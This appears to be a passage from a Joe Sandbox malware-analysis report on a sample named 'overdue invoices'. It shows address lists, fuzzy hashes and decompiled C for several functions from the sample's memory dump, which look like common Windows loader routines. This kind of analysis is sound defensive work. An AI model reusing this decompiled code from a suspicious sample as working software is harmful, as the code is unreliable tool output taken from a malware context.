                  0x009f9b6e
                  0x009f9b7b
                  0x009f9b81
                  0x009f9b85
                  0x009f9b89
                  0x009f9ba7
                  0x009f9b8b
                  0x009f9b91
                  0x009f9b9a
                  0x009f9b9f
                  0x009f9b9f
                  0x009a8788
                  0x009a878d
                  0x009a8763
                  0x009a8763
                  0x009a8766
                  0x00000000
                  0x009a8766
                  0x009f9b70
                  0x00000000
                  0x009f9b70
                  0x009a8656
                  0x009a865a
                  0x009a865c
                  0x009a8752
                  0x009a8756
                  0x00000000
                  0x00000000
                  0x009a875e
                  0x00000000
                  0x009a875e
                  0x009a8662
                  0x009a8662
                  0x009a8662
                  0x009a8666
                  0x00000000
                  0x009a8666
                  0x009a85b7
                  0x009a85b9
                  0x009a85bc
                  0x009a85bf
                  0x009a85cc
                  0x009a85d1
                  0x009a85d4
                  0x009a85db
                  0x009a85de
                  0x009a85e0
                  0x009f9b5f
                  0x00000000
                  0x009f9b5f
                  0x009a85e6
                  0x009a85ea
                  0x009a86c3
                  0x009a86c5
                  0x009a86c8
                  0x009a86ca
                  0x009f9b16
                  0x00000000
                  0x009f9b16
                  0x009a86d6
                  0x009a85f6
                  0x009a85f6
                  0x009a85f9
                  0x009a8602
                  0x009a8606
                  0x009a860a
                  0x009a860b
                  0x009a860e
                  0x009a8611
                  0x00000000
                  0x009a8611
                  0x009a85f3
                  0x00000000
                  0x009a85f3
                  0x009a8619
                  0x009a861e
                  0x009a861e
                  0x009a8621
                  0x009a8622
                  0x009a8623
                  0x009a8625
                  0x009a862c
                  0x00000000
                  0x009a873d
                  0x00000000
                  0x009a873d
                  0x009a8737
                  0x009a850f
                  0x009a8512
                  0x00000000
                  0x009a8512
                  0x00000000
                  0x009a84d6

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04f2ae20d1dcf158eee85d0af31949f875b982179f45549e07ef6b42f794713d
                  • Instruction ID: 06834998f2f0e14914d4a09c411c377278e5015aa21899533af1af2ff79d4a12
                  • Opcode Fuzzy Hash: 04f2ae20d1dcf158eee85d0af31949f875b982179f45549e07ef6b42f794713d
                  • Instruction Fuzzy Hash: 63B14CB0E04249DFDB14DFD9C984BAEBBB9FF89304F20452AE505AB251DB74AD41CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C513A Relevance: .3, Instructions: 258COMMON
                  Download Yara Rule
                  C-Code - Quality: 67%
                  			E009C513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0xa8d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E009DD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E009B2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L009B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E009DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L009AFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0xa8b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L009DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                  0x009c5142
                  0x009c514c
                  0x009c5150
                  0x009c5157
                  0x009c5159
                  0x009c515e
                  0x009c5165
                  0x009c5169
                  0x009c516c
                  0x009c5172
                  0x009c5176
                  0x009c517a
                  0x009c517a
                  0x009c517a
                  0x009c517f
                  0x00a06d8b
                  0x00a06d8e
                  0x00a06d91
                  0x00a06d95
                  0x00a06d98
                  0x00a06d9c
                  0x00a06da0
                  0x00a06da3
                  0x00a06da7
                  0x00a06e26
                  0x00a06e26
                  0x00a06e2a
                  0x009c51f9
                  0x009c51f9
                  0x009c51fe
                  0x00a06e33
                  0x00a06e33
                  0x00a06e39
                  0x00a06e3d
                  0x00a06e46
                  0x00a06e50
                  0x00000000
                  0x00000000
                  0x00a06e52
                  0x00a06e53
                  0x00a06e56
                  0x00a06e5d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a06e5f
                  0x00a06e67
                  0x00a06e77
                  0x00a06e7f
                  0x00a06e80
                  0x00a06e88
                  0x00a06e90
                  0x00a06e9f
                  0x00a06ea5
                  0x00a06ea9
                  0x00a06eb1
                  0x00a06ebf
                  0x00000000
                  0x00000000
                  0x00a06ecf
                  0x00a06ed3
                  0x00000000
                  0x00000000
                  0x00a06edb
                  0x00a06ede
                  0x00a06ee1
                  0x00a06ee8
                  0x00a06eeb
                  0x00a06eed
                  0x00a06ef0
                  0x00a06ef4
                  0x00a06ef8
                  0x00a06efc
                  0x00000000
                  0x00000000
                  0x00a06f0d
                  0x00a06f11
                  0x00a06f32
                  0x00a06f37
                  0x00a06f3b
                  0x00a06f3e
                  0x00a06f41
                  0x00a06f46
                  0x00000000
                  0x00000000
                  0x00a06f4c
                  0x00a06f50
                  0x00a06f50
                  0x00a06f54
                  0x00a06f62
                  0x00a06f65
                  0x00a06f6d
                  0x00a06f7b
                  0x00a06f7b
                  0x00a06f93
                  0x00a06f98
                  0x00a06fa0
                  0x00a06fa6
                  0x00a06fb3
                  0x00a06fb6
                  0x00a06fbf
                  0x00a06fc1
                  0x00a06fd5
                  0x00a06fda
                  0x00a06fda
                  0x00a06fdd
                  0x00a06fe2
                  0x00a06fe7
                  0x00a06feb
                  0x00a06fef
                  0x00a06ff3
                  0x009c520c
                  0x009c520c
                  0x009c520f
                  0x009c5215
                  0x009c5234
                  0x009c523a
                  0x009c523a
                  0x009c5244
                  0x009c5245
                  0x009c5246
                  0x009c5251
                  0x009c5251
                  0x00a06f13
                  0x00a06f17
                  0x00a06f17
                  0x00a06f18
                  0x00a06f1b
                  0x00a06f1f
                  0x00a06f23
                  0x00000000
                  0x00a06f28
                  0x009c5204
                  0x009c5204
                  0x009c5208
                  0x00000000
                  0x009c5208
                  0x009c5185
                  0x009c5188
                  0x009c518a
                  0x009c518e
                  0x009c5195
                  0x00a06db1
                  0x00a06db5
                  0x00a06db9
                  0x009c519b
                  0x009c519b
                  0x009c519e
                  0x009c51a7
                  0x009c51a9
                  0x009c51a9
                  0x009c51b5
                  0x009c51b8
                  0x009c51bb
                  0x009c51be
                  0x009c51c1
                  0x009c51c5
                  0x009c51c9
                  0x009c51cd
                  0x009c51cd
                  0x009c51d8
                  0x009c51dc
                  0x009c51e0
                  0x00a06dcc
                  0x00a06dd0
                  0x00a06dd5
                  0x00a06ddd
                  0x00a06de1
                  0x00a06de1
                  0x00a06de5
                  0x00a06deb
                  0x00a06df1
                  0x00a06df7
                  0x00a06dfd
                  0x00a06e01
                  0x00a06e05
                  0x00a06e09
                  0x00a06e0d
                  0x00a06e11
                  0x00a06e11
                  0x009c51eb
                  0x00a06e1a
                  0x00a06e1f
                  0x00a06e21
                  0x00a06e23
                  0x00000000
                  0x009c51f1
                  0x009c51f1
                  0x00000000
                  0x009c51f1

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60c63e833385c979d65165643b23531c30e543fadbac9ca56ee927cc476f3aac
                  • Instruction ID: 7b7d24e5f53cbebee32a902050de92a8aaa35b19033d14b480bcd2dd5d194ec9
                  • Opcode Fuzzy Hash: 60c63e833385c979d65165643b23531c30e543fadbac9ca56ee927cc476f3aac
                  • Instruction Fuzzy Hash: 0DC103755087818FD354CF28C580B5AFBE1BF88308F18896EF8998B392D775E985CB42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C03E2 Relevance: .3, Instructions: 254COMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E009C03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0xa8d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E009C0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L009DB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E009AB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0xa87c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E009B7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E009B7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E00A17016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E009D9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E00A169A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0xa87c04 != 0) {
						_t118 = _v12;
						_t120 = L00A1A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0xa87bd8;
						if( *0xa87bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E009D95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E009D99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E00A13540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0099B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E009DAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0xa88474 - 3;
										if( *0xa88474 != 3) {
											 *0xa879dc =  *0xa879dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E009B7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E009B7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E00A17016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0xa88708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0xa87b00; // 0x0
							asm("ror esi, cl");
							 *0xa8b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E009D95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = L009A7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                  0x009c03f1
                  0x009c03f7
                  0x009c03f9
                  0x009c03fb
                  0x009c03fd
                  0x009c0400
                  0x009c040a
                  0x00a04c7a
                  0x009c0537
                  0x009c0547
                  0x009c0410
                  0x009c0410
                  0x009c0414
                  0x009c0417
                  0x009c041a
                  0x009c0421
                  0x009c0424
                  0x009c042b
                  0x009c043b
                  0x009c043e
                  0x009c043f
                  0x009c043f
                  0x009c0446
                  0x009c0449
                  0x009c044c
                  0x009c044f
                  0x009c0459
                  0x00a04c8d
                  0x009c045f
                  0x009c045f
                  0x009c045f
                  0x009c0467
                  0x00a04c97
                  0x00a04c9d
                  0x00a04ca4
                  0x00a04caa
                  0x00a04caf
                  0x00a04cb1
                  0x00a04cc3
                  0x00a04cb3
                  0x00a04cbc
                  0x00a04cbc
                  0x00a04cc8
                  0x00a04ccb
                  0x00a04cd7
                  0x00a04cda
                  0x00a04cdf
                  0x00a04cdf
                  0x00a04ccb
                  0x00a04ca4
                  0x009c046d
                  0x009c046f
                  0x009c046f
                  0x009c0471
                  0x009c0476
                  0x009c047a
                  0x009c047b
                  0x009c0483
                  0x009c0489
                  0x009c048d
                  0x00000000
                  0x00000000
                  0x00a04ce9
                  0x00a04cef
                  0x00a04d22
                  0x00a04d22
                  0x00000000
                  0x00a04d22
                  0x00a04cf1
                  0x00a04cf7
                  0x00000000
                  0x00000000
                  0x00a04cf9
                  0x00a04cff
                  0x00000000
                  0x00000000
                  0x00a04d05
                  0x00a04d07
                  0x00000000
                  0x00000000
                  0x00a04d0d
                  0x00a04d0f
                  0x00a04d14
                  0x00a04d16
                  0x00000000
                  0x00000000
                  0x00a04d1c
                  0x00a04d1c
                  0x009c0499
                  0x009c0535
                  0x009c0535
                  0x00000000
                  0x009c0535
                  0x009c04a6
                  0x00a04d2c
                  0x00a04d37
                  0x00a04d39
                  0x00a04d3b
                  0x00000000
                  0x00000000
                  0x00a04d41
                  0x00a04d48
                  0x009c0527
                  0x009c052b
                  0x009c052d
                  0x009c0530
                  0x009c0530
                  0x00000000
                  0x009c052b
                  0x00a04d4e
                  0x009c04ac
                  0x009c04ac
                  0x009c04af
                  0x009c04b2
                  0x009c04b7
                  0x009c04b9
                  0x009c04bb
                  0x009c04bd
                  0x009c04bf
                  0x009c04c5
                  0x009c04c9
                  0x00a04d53
                  0x00a04d59
                  0x00a04db9
                  0x00a04dba
                  0x00a04dbf
                  0x00a04dc2
                  0x00a04dc4
                  0x00a04dc7
                  0x00a04dce
                  0x00000000
                  0x00a04dce
                  0x00a04d5b
                  0x00a04d61
                  0x00000000
                  0x00000000
                  0x00a04d63
                  0x00a04d69
                  0x00000000
                  0x00000000
                  0x00a04d6b
                  0x00a04d6e
                  0x00a04d74
                  0x00a04d76
                  0x00a04d7c
                  0x00a04d7e
                  0x00a04d84
                  0x00a04d89
                  0x00a04d8c
                  0x00a04d8d
                  0x00a04d92
                  0x00a04d95
                  0x00a04d96
                  0x00a04d98
                  0x00a04d9a
                  0x00a04d9f
                  0x00a04da4
                  0x00a04da6
                  0x00a04da8
                  0x00a04daf
                  0x00a04db1
                  0x00a04db1
                  0x00a04daf
                  0x00a04da6
                  0x00a04d84
                  0x00a04d7c
                  0x00000000
                  0x00a04d74
                  0x009c04d6
                  0x00a04de1
                  0x009c04dc
                  0x009c04dc
                  0x009c04dc
                  0x009c04e4
                  0x00a04deb
                  0x00a04df1
                  0x00a04df8
                  0x00a04dfe
                  0x00a04e03
                  0x00a04e05
                  0x00a04e17
                  0x00a04e07
                  0x00a04e10
                  0x00a04e10
                  0x00a04e1c
                  0x00a04e1f
                  0x00a04e35
                  0x00a04e35
                  0x00a04e1f
                  0x00a04df8
                  0x009c04f1
                  0x009c04fa
                  0x00a04e3f
                  0x00a04e47
                  0x00a04e5b
                  0x00a04e61
                  0x00a04e67
                  0x00a04e69
                  0x00a04e71
                  0x00a04e73
                  0x009c0500
                  0x009c0500
                  0x009c0500
                  0x009c04fa
                  0x009c0508
                  0x009c051d
                  0x009c051d
                  0x009c051f
                  0x009c0524
                  0x00000000
                  0x009c0524
                  0x009c0515
                  0x009c0517
                  0x00a04e7a
                  0x00a04e7c
                  0x00000000
                  0x00000000
                  0x00a04e85
                  0x00000000
                  0x00a04e85
                  0x00000000
                  0x009c0517

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 10ae0f7067def58afe24dd06bd9486875aebb8df36ef75d0e168599460890033
                  • Instruction ID: acf3bca73fba99fd9f47291049d10951c712e33f899fe4885c657d9a3bfb8949
                  • Opcode Fuzzy Hash: 10ae0f7067def58afe24dd06bd9486875aebb8df36ef75d0e168599460890033
                  • Instruction Fuzzy Hash: 2D915B71E04258DFEB21DBA8DC45FAE7BA4BF85724F150265FA10AB2E1E7349D00C782
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099C600 Relevance: .2, Instructions: 225COMMON
                  Download Yara Rule
                  C-Code - Quality: 67%
                  			E0099C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0xa8d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E009A6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return L009DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0xa87b9c; // 0x0
					_t74 = L009B4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = L009D9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L009B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E009DF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
